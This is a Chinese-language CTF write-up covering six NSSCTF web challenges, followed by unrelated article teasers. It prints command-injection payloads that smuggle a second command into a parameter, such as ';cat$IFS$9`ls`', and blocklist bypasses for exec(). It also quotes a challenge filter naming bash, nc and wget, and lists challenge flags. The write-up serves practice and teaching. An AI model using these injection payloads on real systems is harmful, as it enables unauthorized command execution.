NSSCTF之Web篇刷题记录(12)

news2024/12/24 9:47:35

NSSCTF之Web篇刷题记录[12]

    • [NCTF 2018]签到题:
    • [鹤城杯 2021]EasyP:
    • [NSSCTF 2022 Spring Recruit]ezgame:
    • [GXYCTF 2019]Ping Ping Ping:
    • [SWPUCTF 2021 新生赛]finalrce:
    • [NISACTF 2022]checkin:

NSSCTF平台:https://www.nssctf.cn/
PS:记得所有的flag都改为NSSCTF

[NCTF 2018]签到题:

打开是一个search.php 查看源代码都没有找到flag,最后在index.php的响应头找到了!

在这里插入图片描述

NSSCTF{w3lc0m3_t0_nctf2018hhhhhhhhhhhh}

[鹤城杯 2021]EasyP:

<?php
include 'utils.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?> 

分析一下代码$_SERVE[‘PHP_SELF’] 调用的脚本的路径
$_SERVER[‘REQUEST_URI’]取得当前URI,也就是除域名外后面的完整的地址路径
basename函数: 返回路径中的文件名部分。

在这里插入图片描述
现在需要绕过preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']和正则 只要在php\后面加一个非ascll码就行比如汉字 由于preg_match正则匹配,我们不能直接输入show_source=‘’ 所以可以将show_source变为show[source
绕过preg_match正则方法是,在 index.php/utils.php后面添加一个非ascii表中的字符(很多都可以)

payload:/index.php/utils.php/巧克力?show[source=1

**加粗样式**

NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}

[NSSCTF 2022 Spring Recruit]ezgame:

玩游戏65分给你flag(懒得玩)提示给的是js所以我们找一下,在js/preload.js中找到FLAG

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}

[GXYCTF 2019]Ping Ping Ping:

这题之前讲过可以参考链接:https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501

Payload:?ip=127.0.0.1;cat$IFS$9`ls`

在这里插入图片描述
在这里插入图片描述

NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}

[SWPUCTF 2021 新生赛]finalrce:

在这里插入图片描述

 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 

preg_match 函数用于执行一个正则表达式匹配,这里看到基本上过滤了很多命令cat,ls这种都不能使用了 可以使用tee命令

由于ls正则表达被过滤,所以我们还需要绕过preg_match 可以使用反斜杠(\)转义字符

这里的tee功能是从标准输入读取,再写入标准输出和文件 Payload:?url=l\s / |tee 1.txt 然后访问1.txt看到flllllaaaaaaggggggg

在这里插入图片描述
tac没有被过滤然后直接 构造Payload:?url=tac /flllll\aaaaaaggggggg | tee 9.txt (记得|后面要空格)在访问9.txt

在这里插入图片描述
在这里插入图片描述

NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}

[NISACTF 2022]checkin:

提示:尝试复制源码看看->010editor

识别到Unicode特殊字符复制到VScode中 复制下来URLencode编码一下

在这里插入图片描述

Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

在这里插入图片描述

NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/560241.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

程序员成长之路有哪些绝对不能踩的坑?

文章目录 一、你在编写代码时&#xff0c;会特别注意哪些流程&#xff1f;二、你在工作过程中踩过哪些坑&#xff1f;你是如何处理的呢&#xff1f;三、结合自身工作经验&#xff0c;分享一下程序员有哪些要避免的坑吧。总结 程序员编写高质量、可维护、安全且高效的代码&#…

【Python文本处理】基于运动路线记录GPX文件解析,心率、速度、时间、功率、踏频、海拔等参数的生成和更改

【Python文本处理】基于运动路线记录GPX文件解析&#xff0c;心率、速度、时间、功率、踏频、海拔等参数的生成和更改 GPX文件本身其实就是坐标、海拔、时间、心率等综合性的xml文件 如图&#xff1a; 海拔&#xff1a;ele 时间&#xff1a;time 心率&#xff1a;heartrate 功…

推荐5个非常强大的ChatGPT浏览器插件|你的生产力提高工具

近期&#xff0c;ChatGPT变得越来越热门&#xff0c;为此&#xff0c;许多浏览器插件也随之问世。这些基于ChatGPT的浏览器插件大大提高了ChatGPT的能力&#xff0c;使得我们能够更高效地在平时的上网、工作和学习中获得帮助&#xff0c;从而节省了大量时间。 今天我来给大家介…

168天,从外包转岗到阿里测开岗.....

本人毕业于某普通二本院校非计算机专业&#xff0c;跨专业入行测试&#xff0c;至今有近 5年工作经验。 第一份测试工作是在腾讯做了两年外包。总体感受就是 这份工作缺乏归属感&#xff0c;心里总有一种落差&#xff0c;进步空间不大&#xff0c; 接触不到核心技术&#xf…

分享以MM32SPIN0280单片机为主控洗衣机方案

洗衣机是利用电能产生机械作用来洗涤衣物的清洁电器&#xff0c;按驱动方法有3类&#xff0c;直接驱动&#xff0c;皮带驱动&#xff0c;波轮式驱动。 主变一体洗衣机方案以MM32SPIN0280为主控 MCU规格&#xff1a; -ArmCortex-M0内核&#xff0c;最高工作频率可达96MHz -128…

软件测试面试至今0 offer的小伙伴,问题到底出在哪儿?

转眼已是五月中旬&#xff0c;求职招聘季也快要结束啦&#xff0c;如果没点真技术 真本事&#xff0c;不了解点职场套路&#xff0c;在今年行情下&#xff0c;找工作可是难上加难。 现在点开微博或者脉脉&#xff0c;只要搜索“招聘”&#xff0c;用“惨不忍睹”来形容也不为过…

《计算机组成原理》期末复习一文总结

文章目录 第1讲&#xff1a;概论一、课程内容课程简介课程教材慕课堂二、课程组成结构计算机系统组成计算机软硬件概念以运算器为中心现代计算机的存储器为中心 硬件各部分关系内存基本组成运算器基本组成累加器&#xff08;相当于寄存器&#xff09; 控制器组成 第2讲&#xf…

[VRTK4.0]设置OpenXRCameraRig

学习目标&#xff1a; 演示如何设置Unity项目以支持OpenXR&#xff0c;以及如何安装VRTK v4TiliaUnitvXRFrameWork用于OpenXR的CameraRig。还展示了如何设置Tilia TrackedAlias预制件可轻松访问底层CameraRig功能。 流程&#xff1a; 步骤一&#xff1a; 我们现在要将我…

【数项级数】敛散性判别

阅读本篇之前&#xff0c;建议可以先看一下上一篇文章哦&#xff01; 【数项级数】无穷个数相加一定是个数吗&#xff1f; 柯西收敛准则判断级数敛散性 基本思想利用柯西收敛准则判断级数是否收敛推论&#xff1a;定理 基本思想 在上一篇文章中&#xff0c;初识数项级数&#…

如果要走网络安全这方面,需要考哪些证呢?

网络工程师VS网络安全工程师&#xff0c;哪个能带你走上人生巅峰&#xff1f; 众所周知&#xff0c;网络安全是以技术为核心的行业&#xff0c;年薪的多少是和技术挂钩的&#xff0c;但是很多没有工作经验的或者想转行到网安的大学生想要找到一份好工作&#xff0c;一个含金量…

Unity 灯光组件Light

灯光简介 在 Hierarchy 窗口右键&#xff0c;选择 Light&#xff0c;再选择具体的灯光类型&#xff0c;在 Inspector 窗口查看灯光组件如下&#xff1a; Type&#xff1a;灯光类型&#xff0c;主要有&#xff1a;Directional&#xff08;平行光&#xff09;、Spot&#xff08;聚…

【OpenStack】初识

云计算中的操作系统&#xff0c;负责计算能力 三大核心组件&#xff1a;子项目nova负责计算能力、neutron(Quantum):Networking网络、Swift&#xff1a;Storage 存储 共享服务&#xff1a;认证服务、数据库服务等 api、dashboard浏览器界面 主要组件&#xff1a; 1. 2. OpenSt…

uniapp在H5获取当前定位信息不需要SDK可直接获取城市(包括经纬度省市区和市区编码)

前言 最近在做获取用户当前定位信息的时候&#xff0c;发现uniapp官方提供的uni.getLocation(OBJECT)兼容性并不是特别好&#xff0c;光注意事项都是密密麻麻一大堆&#xff0c;在实际使用场景下&#xff0c;效果并不理想&#xff0c;也不是很稳定。于是便重新封装了一下腾讯地…

前端web入门-CSS-day03

(创作不易&#xff0c;感谢有你&#xff0c;你的支持&#xff0c;就是我前行的最大动力&#xff0c;如果看完对你有帮助&#xff0c;请留下您的足迹&#xff09; 目录 CSS 初体验 CSS 定义 CSS 引入方式 选择器 标签选择器 类选择器 id选择器 通配符选择器 画盒子 …

“智慧赋能 强链塑链”——浅谈核电行业物资供应管理优化新动能

核电备件供应链管理创新的必要性、 迫切性和重要性 核电厂对核电机组的稳定运行和核安全有着非常高的要求&#xff0c;在我国核电发展初期阶段&#xff0c;核电厂为了提高机组的安全稳定运行&#xff0c;通常都备有种类多、数量大的备品备件。经过多年的运营&#xff0c;现役…

华为、思科、Juniper 三厂商NAT配置详解

大家好&#xff0c;这里是网络技术联盟站。 本文给大家介绍华为、思科、Juniper 三大厂商NAT配置详解。 1. 华为&#xff08;Huawei&#xff09; 华为是一家全球领先的信息与通信技术解决方案供应商&#xff0c;其网络设备提供了强大的NAT功能。 下面是华为设备上的NAT配置示…

C语言——自定义数据类型

C语言自定义数据类型——结构体、共用体、枚举 目录 一、 结构体的基本用法1.1 定义1.2 定义格式1.3 结构体变量1.3.1 概念1.3.2 格式1.3.3 定义结构体变量(1) 先定义结构体&#xff0c;再定义结构体变量。(2) 定义结构体的同时&#xff0c;定义结构体变量。 1.3.4 结构体变量…

L1L2,范数损失

目录 1. L2范数&#xff08;欧氏距离&#xff09;2. L2范数损失&#xff0c;这个听的/用的少一些3-1. L2损失&#xff08;均方误差&#xff09;3-2. L1损失&#xff08;平均绝对误差&#xff09;4. L1范数L2范数在机器学习方面的区别5. 为什么L2范数可以防止过拟合? 1. L2范数…

函数式接口入门简介

这里写目录标题 引子四种函数式接口-简单Demo四种函数式接口介绍函数式接口实战-代码对比 引子 只包含一个抽象方法的接口&#xff0c;就称为函数式接口。来源&#xff1a;java.util.function 我想在方法内直接定义方法直接获得结果&#xff0c;主要是也是为了配置lambda表达…

斐波那契数列数列相关简化2

看这篇文章前先看一下第一篇文章&#xff1a; 斐波那契数列数列相关简化1_鱼跃鹰飞的博客-CSDN博客 根据第一篇文章总结如下&#xff1a; 如果某个递归&#xff0c;除了初始项之外&#xff0c;具有如下的形式 F(N) C1 * F(N) C2 * F(N-1) … Ck * F(N-k) ( C1…Ck 和k都…